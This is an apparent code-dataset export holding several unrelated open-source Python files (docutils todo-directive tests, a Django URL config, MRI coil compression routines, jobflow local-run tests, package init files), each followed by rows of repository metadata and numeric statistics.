t1 = "this code shoud appear"
if t1 not in html:
raise Exception(html)
t1 = "after"
if t1 not in html:
raise Exception(html)
t1 = "first todo"
if t1 not in html:
raise Exception(html)
t1 = "(bug)"
if t1 not in html:
raise Exception(html)
t1 = 'href="http://7"'
if t1 not in html:
raise Exception(html)
def test_todoextlist(self):
fLOG(
__file__,
self._testMethodName,
OutputPrint=__name__ == "__main__")
from docutils import nodes as skip_
content = """
test a directive
================
before
.. todoext::
:title: first todo
this code shoud appear___
middle
.. todoextlist::
after
""".replace(" ", "")
if sys.version_info[0] >= 3:
content = content.replace('u"', '"')
tives = [("todoext", TodoExt, todoext_node,
visit_todoext_node, depart_todoext_node)]
html = rst2html(content, writer="rst", keep_warnings=True,
directives=tives, layout="sphinx",
todoext_include_todosext=True)
temp = get_temp_folder(__file__, "temp_todoextlist")
with open(os.path.join(temp, "out_todoext.html"), "w", encoding="utf8") as f:
f.write(html)
t1 = "this code shoud appear"
if t1 not in html:
raise Exception(html)
t1 = "after"
if t1 not in html:
raise Exception(html)
t1 = "first todo"
if t1 not in html:
raise Exception(html)
t1 = "(The `original entry"
if t1 not in html:
raise Exception(html)
def test_todoext_done(self):
fLOG(
__file__,
self._testMethodName,
OutputPrint=__name__ == "__main__")
from docutils import nodes as skip_
content = """
test a directive
================
before
.. todoext::
:title: first todo
:tag: bug
:issue: 7
:hidden:
this code shoud appear___
after
""".replace(" ", "")
if sys.version_info[0] >= 3:
content = content.replace('u"', '"')
tives = [("todoext", TodoExt, todoext_node,
visit_todoext_node, depart_todoext_node)]
html = rst2html(content, writer="custom", keep_warnings=True,
directives=tives, extlinks={'issue': ('http://%s', '_issue_')})
temp = get_temp_folder(__file__, "temp_todoext")
with open(os.path.join(temp, "out_todoext.html"), "w", encoding="utf8") as f:
f.write(html)
t1 = "this code shoud appear"
if t1 in html:
raise Exception(html)
t1 = "after"
if t1 not in html:
raise Exception(html)
t1 = "first todo"
if t1 in html:
raise Exception(html)
t1 = "(bug)"
if t1 in html:
raise Exception(html)
t1 = 'href="http://7"'
if t1 in html:
raise Exception(html)
if __name__ == "__main__":
unittest.main()
| 27.69 | 114 | 0.498375 | 535 | 5,538 | 4.893458 | 0.203738 | 0.032086 | 0.058824 | 0.106952 | 0.756303 | 0.744461 | 0.734912 | 0.725745 | 0.708938 | 0.668449 | 0 | 0.01383 | 0.399422 | 5,538 | 199 | 115 | 27.829146 | 0.773301 | 0.009751 | 0 | 0.815603 | 0 | 0 | 0.283784 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028369 | false | 0 | 0.085106 | 0 | 0.120567 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fa76f83344682464aa866ac9ac2702e7db6b9a16 | 484 | py | Python | htsworkflow/frontend/reports/urls.py | detrout/htsworkflow | 99d3300e2533d79428ad49aaf10b9429b175da2d | [
"BSD-3-Clause"
] | null | null | null | htsworkflow/frontend/reports/urls.py | detrout/htsworkflow | 99d3300e2533d79428ad49aaf10b9429b175da2d | [
"BSD-3-Clause"
] | 1 | 2018-02-26T18:30:05.000Z | 2018-02-26T18:30:05.000Z | htsworkflow/frontend/reports/urls.py | detrout/htsworkflow | 99d3300e2533d79428ad49aaf10b9429b175da2d | [
"BSD-3-Clause"
] | null | null | null | from django.conf.urls import patterns
urlpatterns = patterns('',
(r'^updLibInfo$', 'htsworkflow.frontend.reports.libinfopar.refreshLibInfoFile'),
(r'^report$', 'htsworkflow.frontend.reports.reports.report1'),
(r'^report_RM$', 'htsworkflow.frontend.reports.reports.report_RM'),
(r'^report_FCs$', 'htsworkflow.frontend.reports.reports.getNotRanFCs'),
(r'^liblist$', 'htsworkflow.frontend.reports.reports.test_Libs')
)
| 48.4 | 84 | 0.663223 | 47 | 484 | 6.744681 | 0.468085 | 0.299685 | 0.410095 | 0.416404 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002513 | 0.177686 | 484 | 9 | 85 | 53.777778 | 0.79397 | 0 | 0 | 0 | 0 | 0 | 0.609504 | 0.502066 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fab3b230e9c8415a9b6f8d083fee2b797fefea58 | 65 | py | Python | Model_Explanation/__init__.py | karthi12ck/Model-Explanation | 08822797d12f0598706abae3a65d4fe8d6ee294a | [
"MIT"
] | null | null | null | Model_Explanation/__init__.py | karthi12ck/Model-Explanation | 08822797d12f0598706abae3a65d4fe8d6ee294a | [
"MIT"
] | null | null | null | Model_Explanation/__init__.py | karthi12ck/Model-Explanation | 08822797d12f0598706abae3a65d4fe8d6ee294a | [
"MIT"
] | null | null | null | from Model_Explanaton.Model_Explanation import Model_Explanation
| 32.5 | 64 | 0.923077 | 8 | 65 | 7.125 | 0.625 | 0.561404 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.061538 | 65 | 1 | 65 | 65 | 0.934426 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
87de94a52cc733aaf892fda6010c3ca442764dc9 | 7,149 | py | Python | utils/coilcomp.py | milesgray/CALAE | a2ab2f7d9ee17cc6c24ff6ac370b0373537079ac | [
"Apache-2.0"
] | null | null | null | utils/coilcomp.py | milesgray/CALAE | a2ab2f7d9ee17cc6c24ff6ac370b0373537079ac | [
"Apache-2.0"
] | null | null | null | utils/coilcomp.py | milesgray/CALAE | a2ab2f7d9ee17cc6c24ff6ac370b0373537079ac | [
"Apache-2.0"
] | null | null | null | """Coil compression.
Reference(s):
[1] Zhang T, Pauly JM, Vasanawala SS, Lustig M. Coil compression for
accelerated imaging with Cartesian sampling. Magn Reson Med 2013
Mar 9;69:571-582
"""
import os
import sys
import numpy as np
from mri_util import fftc
def calc_gcc_weights_c(ks_calib, num_virtual_channels, correction=True):
"""Calculate coil compression weights.
Input
ks_calib -- raw k-space data of dimensions
(num_channels, num_readout, num_kx)
num_virtual_channels -- number of virtual channels to compress to
correction -- apply rotation correction (default: True)
Output
cc_mat -- coil compression matrix (use apply_gcc_weights)
"""
me = "coilcomp.calc_gcc_weights_c"
num_kx = ks_calib.shape[2]
# num_readout = ks_calib.shape[1]
num_channels = ks_calib.shape[0]
if num_virtual_channels > num_channels:
        print(
            "%s> Num of virtual channels (%d) is more than the actual"
            " channels (%d)!" % (me, num_virtual_channels, num_channels)
        )
return np.eye(num_channels, dtype=np.complex64)
if num_kx > 1:
# find max in readout
tmp = np.sum(np.sum(np.power(np.abs(ks_calib), 2), axis=0), axis=1)
i_xmax = np.argmax(tmp)
# circ shift to move max to center (make copy to not touch original data)
ks_calib_int = np.roll(ks_calib.copy(), int(num_kx / 2 - i_xmax), axis=-1)
ks_calib_int = fftc.ifftc(ks_calib_int, axis=-1)
else:
ks_calib_int = ks_calib.copy()
cc_mat = np.zeros((num_virtual_channels, num_channels, num_kx), dtype=np.complex64)
for i_x in range(num_kx):
ks_calib_x = np.squeeze(ks_calib_int[:, :, i_x])
U, s, Vh = np.linalg.svd(ks_calib_x.T, full_matrices=False)
V = Vh.conj()
cc_mat[:, :, i_x] = V[0:num_virtual_channels, :]
if correction:
for i_x in range(int(num_kx / 2) - 2, -1, -1):
V1 = cc_mat[:, :, i_x + 1]
V2 = cc_mat[:, :, i_x]
A = np.matmul(V1.conj(), V2.T)
Ua, sa, Vah = np.linalg.svd(A, full_matrices=False)
P = np.matmul(Ua, Vah)
P = P.conj()
cc_mat[:, :, i_x] = np.matmul(P, cc_mat[:, :, i_x])
for i_x in range(int(num_kx / 2) - 1, num_kx, 1):
V1 = cc_mat[:, :, i_x - 1]
V2 = cc_mat[:, :, i_x]
A = np.matmul(V1.conj(), V2.T)
Ua, sa, Vah = np.linalg.svd(A, full_matrices=False)
P = np.matmul(Ua, Vah)
P = P.conj()
cc_mat[:, :, i_x] = np.matmul(P, np.squeeze(cc_mat[:, :, i_x]))
return cc_mat
def apply_gcc_weights_c(ks, cc_mat):
"""Apply coil compression weights.
Input
ks -- raw k-space data of dimensions (num_channels, num_readout, num_kx)
cc_mat -- coil compression matrix calculated using calc_gcc_weights
Output
ks_out -- coil compresssed data
"""
me = "coilcomp.apply_gcc_weights_c"
num_channels = ks.shape[0]
num_readout = ks.shape[1]
num_kx = ks.shape[2]
num_virtual_channels = cc_mat.shape[0]
if num_channels != cc_mat.shape[1]:
print("%s> ERROR! num channels does not match!" % me)
print("%s> ks: num channels = %d" % (me, num_channels))
print("%s> cc_mat: num channels = %d" % (me, cc_mat.shape[1]))
ks_x = fftc.ifftc(ks, axis=-1)
ks_out = np.zeros((num_virtual_channels, num_readout, num_kx), dtype=np.complex64)
for i_channel in range(num_virtual_channels):
cc_mat_i = np.reshape(cc_mat[i_channel, :, :], (num_channels, 1, num_kx))
ks_out[i_channel, :, :] = np.sum(ks_x * cc_mat_i, axis=0)
ks_out = fftc.fftc(ks_out, axis=-1)
return ks_out
def calc_gcc_weights(ks_calib, num_virtual_channels, correction=True):
"""Calculate coil compression weights.
Input
ks_calib -- raw k-space data of dimensions (num_kx, num_readout, num_channels)
num_virtual_channels -- number of virtual channels to compress to
correction -- apply rotation correction (default: True)
Output
cc_mat -- coil compression matrix (use apply_gcc_weights)
"""
me = "coilcomp.calc_gcc_weights"
num_kx = ks_calib.shape[0]
# num_readout = ks_calib.shape[1]
num_channels = ks_calib.shape[2]
if num_virtual_channels > num_channels:
print(
"%s> Num of virtual channels (%d) is more than the actual channels (%d)!"
% (me, num_virtual_channels, num_channels)
)
return np.eye(num_channels, dtype=complex)
# find max in readout
tmp = np.sum(np.sum(np.power(np.abs(ks_calib), 2), axis=2), axis=1)
i_xmax = np.argmax(tmp)
# circ shift to move max to center (make copy to not touch original data)
ks_calib_int = np.roll(ks_calib.copy(), int(num_kx / 2 - i_xmax), axis=0)
ks_calib_int = fftc.ifftc(ks_calib_int, axis=0)
cc_mat = np.zeros((num_kx, num_channels, num_virtual_channels), dtype=complex)
for i_x in range(num_kx):
ks_calib_x = np.squeeze(ks_calib_int[i_x, :, :])
U, s, Vh = np.linalg.svd(ks_calib_x, full_matrices=False)
V = Vh.conj().T
cc_mat[i_x, :, :] = V[:, 0:num_virtual_channels]
if correction:
for i_x in range(int(num_kx / 2) - 2, -1, -1):
V1 = cc_mat[i_x + 1, :, :]
V2 = cc_mat[i_x, :, :]
A = np.matmul(V1.conj().T, V2)
Ua, sa, Vah = np.linalg.svd(A, full_matrices=False)
P = np.matmul(Ua, Vah)
P = P.conj().T
cc_mat[i_x, :, :] = np.matmul(cc_mat[i_x, :, :], P)
for i_x in range(int(num_kx / 2) - 1, num_kx, 1):
V1 = cc_mat[i_x - 1, :, :]
V2 = cc_mat[i_x, :, :]
A = np.matmul(V1.conj().T, V2)
Ua, sa, Vah = np.linalg.svd(A, full_matrices=False)
P = np.matmul(Ua, Vah)
P = P.conj().T
cc_mat[i_x, :, :] = np.matmul(np.squeeze(cc_mat[i_x, :, :]), P)
return cc_mat
def apply_gcc_weights(ks, cc_mat):
""" Apply coil compression weights
Input
ks -- raw k-space data of dimensions (num_kx, num_readout, num_channels)
cc_mat -- coil compression matrix calculated using calc_gcc_weights
Output
ks_out -- coil compresssed data
"""
me = "coilcomp.apply_gcc_weights"
if ks.shape[2] != cc_mat.shape[1]:
print("%s> ERROR! num channels does not match!" % me)
print("%s> ks: num channels = %d" % (me, ks.shape[2]))
print("%s> cc_mat: num channels = %d" % (me, cc_mat.shape[1]))
num_kx = ks.shape[0]
num_readout = ks.shape[1]
num_channels = ks.shape[2]
num_virtual_channels = cc_mat.shape[2]
ks_x = fftc.ifftc(ks, axis=0)
ks_out = np.zeros((num_kx, num_readout, num_virtual_channels), dtype=complex)
for i_channel in range(num_virtual_channels):
cc_mat_i = np.reshape(cc_mat[:, :, i_channel], (num_kx, 1, num_channels))
ks_out[:, :, i_channel] = np.sum(ks_x * cc_mat_i, axis=2)
ks_out = fftc.fftc(ks_out, axis=0)
return ks_out
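As a runnable illustration of the SVD step at the heart of both `calc_gcc_weights` variants, this standalone sketch uses plain numpy on synthetic data at a single kx location, skipping the `fftc` readout transform and the rotation-alignment correction:

```python
import numpy as np

rng = np.random.default_rng(0)
num_readout, num_channels, num_virtual = 64, 8, 4
# Synthetic complex calibration data at one kx location.
ks_x = (rng.standard_normal((num_readout, num_channels))
        + 1j * rng.standard_normal((num_readout, num_channels)))
U, s, Vh = np.linalg.svd(ks_x, full_matrices=False)
cc = Vh.conj().T[:, :num_virtual]   # compression matrix (channels x virtual)
ks_compressed = ks_x @ cc           # (num_readout, num_virtual)
# Fraction of signal energy captured by the leading singular vectors.
retained = float(np.sum(s[:num_virtual] ** 2) / np.sum(s ** 2))
print(ks_compressed.shape, round(retained, 3))
```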
| 35.391089 | 87 | 0.600643 | 1,123 | 7,149 | 3.587711 | 0.127337 | 0.052122 | 0.035741 | 0.031273 | 0.897493 | 0.864731 | 0.820055 | 0.769422 | 0.769422 | 0.720774 | 0 | 0.018519 | 0.26731 | 7,149 | 201 | 88 | 35.567164 | 0.750668 | 0.215135 | 0 | 0.4 | 0 | 0 | 0.081046 | 0.019393 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.033333 | 0 | 0.116667 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
87f1ca2c8051586c4c21e17fc2a5c86fa8ae9715 | 11,620 | py | Python | tests/managers/test_local.py | arosen93/jobflow | fbd5868394c6f4f6b4f2e0ccf4b7ff7d21fe7258 | [
"BSD-3-Clause-LBNL"
] | 10 | 2021-11-13T07:43:27.000Z | 2022-03-14T11:05:15.000Z | tests/managers/test_local.py | arosen93/jobflow | fbd5868394c6f4f6b4f2e0ccf4b7ff7d21fe7258 | [
"BSD-3-Clause-LBNL"
] | 69 | 2021-08-31T13:15:54.000Z | 2022-03-31T21:43:56.000Z | tests/managers/test_local.py | arosen93/jobflow | fbd5868394c6f4f6b4f2e0ccf4b7ff7d21fe7258 | [
"BSD-3-Clause-LBNL"
] | 5 | 2021-10-17T03:52:57.000Z | 2022-03-31T00:17:20.000Z | import pytest
def test_simple_job(memory_jobstore, clean_dir, simple_job):
from jobflow import run_locally
# run with log
job = simple_job("12345")
uuid = job.uuid
responses = run_locally(job, store=memory_jobstore)
# check responses has been filled
assert responses[uuid][1].output == "12345_end"
# check store has the activity output
result = memory_jobstore.query_one({"uuid": uuid})
assert result["output"] == "12345_end"
# test run no store
job = simple_job("12345")
uuid = job.uuid
responses = run_locally(job)
assert responses[uuid][1].output == "12345_end"
def test_simple_flow(memory_jobstore, clean_dir, simple_flow, capsys):
from pathlib import Path
from jobflow import run_locally
flow = simple_flow()
uuid = flow.jobs[0].uuid
# run without log
run_locally(flow, store=memory_jobstore, log=False)
captured = capsys.readouterr()
assert "INFO Started executing jobs locally" not in captured.out
assert "INFO Finished executing jobs locally" not in captured.out
# run with log
responses = run_locally(flow, store=memory_jobstore)
    # check responses have been filled
assert responses[uuid][1].output == "12345_end"
# check store has the activity output
result = memory_jobstore.query_one({"uuid": uuid})
assert result["output"] == "12345_end"
# check no folders were written
folders = list(Path(".").glob("job_*/"))
assert len(folders) == 0
# check logs printed
captured = capsys.readouterr()
assert "INFO Started executing jobs locally" in captured.out
assert "INFO Finished executing jobs locally" in captured.out
# run with folders
responses = run_locally(flow, store=memory_jobstore, create_folders=True)
assert responses[uuid][1].output == "12345_end"
folders = list(Path(".").glob("job_*/"))
assert len(folders) == 1
def test_connected_flow(memory_jobstore, clean_dir, connected_flow):
from jobflow import run_locally
flow = connected_flow()
uuid1 = flow.jobs[0].uuid
uuid2 = flow.jobs[1].uuid
# run with log
responses = run_locally(flow, store=memory_jobstore)
    # check responses have been filled
assert len(responses) == 2
assert responses[uuid1][1].output == "12345_end"
assert responses[uuid2][1].output == "12345_end_end"
# check store has the activity output
result1 = memory_jobstore.query_one({"uuid": uuid1})
result2 = memory_jobstore.query_one({"uuid": uuid2})
assert result1["output"] == "12345_end"
assert result2["output"] == "12345_end_end"
def test_nested_flow(memory_jobstore, clean_dir, nested_flow):
from jobflow import run_locally
flow = nested_flow()
uuid1 = flow.jobs[0].jobs[0].uuid
uuid2 = flow.jobs[0].jobs[1].uuid
uuid3 = flow.jobs[1].jobs[0].uuid
uuid4 = flow.jobs[1].jobs[1].uuid
# run with log
responses = run_locally(flow, store=memory_jobstore)
    # check responses have been filled
assert len(responses) == 4
assert responses[uuid1][1].output == "12345_end"
assert responses[uuid2][1].output == "12345_end_end"
assert responses[uuid3][1].output == "12345_end_end_end"
assert responses[uuid4][1].output == "12345_end_end_end_end"
# check store has the activity output
result1 = memory_jobstore.query_one({"uuid": uuid1})
result2 = memory_jobstore.query_one({"uuid": uuid2})
result3 = memory_jobstore.query_one({"uuid": uuid3})
result4 = memory_jobstore.query_one({"uuid": uuid4})
assert result1["output"] == "12345_end"
assert result2["output"] == "12345_end_end"
assert result3["output"] == "12345_end_end_end"
assert result4["output"] == "12345_end_end_end_end"
def test_addition_flow(memory_jobstore, clean_dir, addition_flow):
from jobflow import run_locally
flow = addition_flow()
uuid1 = flow.jobs[0].uuid
# run with log
responses = run_locally(flow, store=memory_jobstore)
uuid2 = [u for u in responses.keys() if u != uuid1][0]
    # check responses have been filled
assert len(responses) == 2
assert responses[uuid1][1].output == 11
assert responses[uuid1][1].addition is not None
assert responses[uuid2][1].output == "11_end"
# check store has the activity output
result1 = memory_jobstore.query_one({"uuid": uuid1})
result2 = memory_jobstore.query_one({"uuid": uuid2})
assert result1["output"] == 11
assert result2["output"] == "11_end"
def test_detour_flow(memory_jobstore, clean_dir, detour_flow):
from jobflow import run_locally
flow = detour_flow()
uuid1 = flow.jobs[0].uuid
uuid3 = flow.jobs[1].uuid
# run with log
responses = run_locally(flow, store=memory_jobstore)
uuid2 = [u for u in responses.keys() if u != uuid1 and u != uuid3][0]
    # check responses have been filled
assert len(responses) == 3
assert responses[uuid1][1].output == 11
assert responses[uuid1][1].detour is not None
assert responses[uuid2][1].output == "11_end"
assert responses[uuid3][1].output == "12345_end"
# check store has the activity output
result1 = memory_jobstore.query_one({"uuid": uuid1})
result2 = memory_jobstore.query_one({"uuid": uuid2})
result3 = memory_jobstore.query_one({"uuid": uuid3})
assert result1["output"] == 11
assert result2["output"] == "11_end"
assert result3["output"] == "12345_end"
# assert job2 (detoured job) ran before job3
assert result2["completed_at"] < result3["completed_at"]
def test_replace_flow(memory_jobstore, clean_dir, replace_flow):
from jobflow import run_locally
flow = replace_flow()
uuid1 = flow.jobs[0].uuid
uuid2 = flow.jobs[1].uuid
# run with log
responses = run_locally(flow, store=memory_jobstore)
    # check responses have been filled
assert len(responses) == 2
assert len(responses[uuid1]) == 2
assert responses[uuid1][1].output == 11
assert responses[uuid1][1].replace is not None
assert responses[uuid1][2].output == "11_end"
assert responses[uuid2][1].output == "12345_end"
# check store has the activity output
result1 = memory_jobstore.query_one({"uuid": uuid1, "index": 1})
result2 = memory_jobstore.query_one({"uuid": uuid1, "index": 2})
result3 = memory_jobstore.query_one({"uuid": uuid2, "index": 1})
assert result1["output"] == 11
assert result2["output"] == "11_end"
assert result3["output"] == "12345_end"
# assert job2 (replaced job) ran before job3
assert result2["completed_at"] < result3["completed_at"]
def test_replace_flow_nested(memory_jobstore, clean_dir, replace_flow_nested):
from jobflow import run_locally
flow = replace_flow_nested()
uuid1 = flow.jobs[0].uuid
uuid2 = flow.jobs[1].uuid
# run with log
responses = run_locally(flow, store=memory_jobstore)
    # check responses have been filled
assert len(responses) == 4
assert len(responses[uuid1]) == 2
assert responses[uuid1][1].output == 11
assert responses[uuid1][1].replace is not None
assert responses[uuid1][2].output["first"].__class__.__name__ == "OutputReference"
assert responses[uuid2][1].output == "12345_end"
# check store has the activity output
result1 = memory_jobstore.query_one({"uuid": uuid1, "index": 1})
result2 = memory_jobstore.query_one({"uuid": uuid1, "index": 2})
result3 = memory_jobstore.query_one({"uuid": uuid2, "index": 1})
assert result1["output"] == 11
assert result2["output"]["first"]["@class"] == "OutputReference"
assert result3["output"] == "12345_end"
# assert job2 (replaced job) ran before job3
assert result2["completed_at"] < result3["completed_at"]
def test_stop_jobflow_flow(memory_jobstore, clean_dir, stop_jobflow_flow):
from jobflow import run_locally
flow = stop_jobflow_flow()
uuid1 = flow.jobs[0].uuid
# run with log
responses = run_locally(flow, store=memory_jobstore)
    # check responses have been filled
assert len(responses) == 1
assert len(responses[uuid1]) == 1
assert responses[uuid1][1].output == "1234"
assert responses[uuid1][1].stop_jobflow is True
# check store has the activity output
result1 = memory_jobstore.query_one({"uuid": uuid1})
assert result1["output"] == "1234"
def test_stop_jobflow_job(memory_jobstore, clean_dir, stop_jobflow_job):
from jobflow import run_locally
job = stop_jobflow_job()
uuid1 = job.uuid
# run with log
responses = run_locally(job, store=memory_jobstore)
    # check responses have been filled
assert len(responses) == 1
assert len(responses[uuid1]) == 1
assert responses[uuid1][1].output == "1234"
assert responses[uuid1][1].stop_jobflow is True
# check store has the activity output
result1 = memory_jobstore.query_one({"uuid": uuid1})
assert result1["output"] == "1234"
def test_stop_children_flow(memory_jobstore, clean_dir, stop_children_flow):
from jobflow import run_locally
flow = stop_children_flow()
uuid1 = flow.jobs[0].uuid
uuid2 = flow.jobs[1].uuid
uuid3 = flow.jobs[2].uuid
# run with log
responses = run_locally(flow, store=memory_jobstore)
    # check responses have been filled
assert len(responses) == 2
assert len(responses[uuid1]) == 1
assert uuid2 not in responses
assert responses[uuid1][1].output == "1234"
assert responses[uuid1][1].stop_children is True
assert responses[uuid3][1].output == "12345_end"
# check store has the activity output
result1 = memory_jobstore.query_one({"uuid": uuid1})
result2 = memory_jobstore.query_one({"uuid": uuid2})
result3 = memory_jobstore.query_one({"uuid": uuid3})
assert result1["output"] == "1234"
assert result2 is None
assert result3["output"] == "12345_end"
def test_error_flow(memory_jobstore, clean_dir, error_flow, capsys):
from jobflow import run_locally
flow = error_flow()
# run with log
responses = run_locally(flow, store=memory_jobstore)
    # check responses have been filled
assert len(responses) == 0
captured = capsys.readouterr()
assert "error_func failed with exception" in captured.out
with pytest.raises(RuntimeError):
run_locally(flow, store=memory_jobstore, ensure_success=True)
def test_stored_data_flow(memory_jobstore, clean_dir, stored_data_flow, capsys):
from jobflow import run_locally
flow = stored_data_flow()
responses = run_locally(flow, store=memory_jobstore)
captured = capsys.readouterr()
    # check responses have been filled
assert len(responses) == 1
assert "Response.stored_data is not supported" in captured.out
def test_detour_stop_flow(memory_jobstore, clean_dir, detour_stop_flow):
from jobflow import run_locally
flow = detour_stop_flow()
uuid1 = flow.jobs[0].uuid
uuid3 = flow.jobs[1].uuid
# run with log
responses = run_locally(flow, store=memory_jobstore)
uuid2 = [u for u in responses.keys() if u != uuid1 and u != uuid3][0]
    # check responses have been filled
assert len(responses) == 2
assert responses[uuid1][1].output == 11
assert responses[uuid1][1].detour is not None
assert responses[uuid2][1].output == "1234"
# check store has the activity output
result1 = memory_jobstore.query_one({"uuid": uuid1})
result2 = memory_jobstore.query_one({"uuid": uuid2})
result3 = memory_jobstore.query_one({"uuid": uuid3})
assert result1["output"] == 11
assert result2["output"] == "1234"
assert result3 is None
| 31.923077 | 86 | 0.691652 | 1,565 | 11,620 | 4.959744 | 0.072204 | 0.104612 | 0.066091 | 0.076527 | 0.888817 | 0.849266 | 0.77815 | 0.740273 | 0.684102 | 0.651894 | 0 | 0.047213 | 0.192513 | 11,620 | 363 | 87 | 32.011019 | 0.780028 | 0.109897 | 0 | 0.686916 | 0 | 0 | 0.097037 | 0.00408 | 0 | 0 | 0 | 0 | 0.425234 | 1 | 0.065421 | false | 0 | 0.074766 | 0 | 0.140187 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e2168844389b9cc08ad416bffa0cedf22fd218f1 | 235 | py | Python | gerrychain/proposals/__init__.py | InnovativeInventor/GerryChain | 4ee30472072b26f86bf6349b5a1dc90412a4acc1 | [
"BSD-3-Clause"
] | 89 | 2018-10-15T21:08:50.000Z | 2022-03-08T02:45:13.000Z | gerrychain/proposals/__init__.py | InnovativeInventor/GerryChain | 4ee30472072b26f86bf6349b5a1dc90412a4acc1 | [
"BSD-3-Clause"
] | 114 | 2018-10-16T04:08:52.000Z | 2022-03-19T05:21:38.000Z | gerrychain/proposals/__init__.py | InnovativeInventor/GerryChain | 4ee30472072b26f86bf6349b5a1dc90412a4acc1 | [
"BSD-3-Clause"
] | 47 | 2018-10-16T03:51:54.000Z | 2022-01-16T17:47:32.000Z | from .proposals import *
from .tree_proposals import recom, reversible_recom, ReCom
from .spectral_proposals import spectral_recom
__all__ = ["recom", "reversible_recom", "spectral_recom", "propose_chunk_flip", "propose_random_flip"]
| 39.166667 | 102 | 0.808511 | 29 | 235 | 6.068966 | 0.413793 | 0.255682 | 0.227273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093617 | 235 | 5 | 103 | 47 | 0.826291 | 0 | 0 | 0 | 0 | 0 | 0.306383 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.75 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
35e758dfad672c97707ca6e23f62ad006f2e0259 | 44 | py | Python | tests/tests/class_var.py | yu-i9/mini_python | d62b9040f8427057a20d18340a27bdf2dfc8c22e | [
"MIT"
] | 2 | 2018-06-22T07:07:03.000Z | 2018-08-03T04:26:43.000Z | tests/tests/class_var.py | yu-i9/mini_python | d62b9040f8427057a20d18340a27bdf2dfc8c22e | [
"MIT"
] | null | null | null | tests/tests/class_var.py | yu-i9/mini_python | d62b9040f8427057a20d18340a27bdf2dfc8c22e | [
"MIT"
] | null | null | null | class Hoge:
x = 42
assert Hoge.x == 42
| 8.8 | 19 | 0.568182 | 8 | 44 | 3.125 | 0.625 | 0.4 | 0.56 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 0.318182 | 44 | 4 | 20 | 11 | 0.7 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0 | false | 0 | 0 | 0 | 0.666667 | 0 | 1 | 1 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
ea11205c57453ca8c4fc2ab5d99e5aa4df601e8e | 25 | py | Python | Course 1: Programming for Everbody (Getting Started with Python)/Week 3 (First python program)/Hello.py | kunal5042/Python-for-Everybody | ed702f92c963a467ffb682f171ba0bbb1b571726 | [
"MIT"
] | null | null | null | Course 1: Programming for Everbody (Getting Started with Python)/Week 3 (First python program)/Hello.py | kunal5042/Python-for-Everybody | ed702f92c963a467ffb682f171ba0bbb1b571726 | [
"MIT"
] | null | null | null | Course 1: Programming for Everbody (Getting Started with Python)/Week 3 (First python program)/Hello.py | kunal5042/Python-for-Everybody | ed702f92c963a467ffb682f171ba0bbb1b571726 | [
"MIT"
] | null | null | null | print("\nHello World!\n") | 25 | 25 | 0.68 | 4 | 25 | 4.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04 | 25 | 1 | 25 | 25 | 0.708333 | 0 | 0 | 0 | 0 | 0 | 0.615385 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
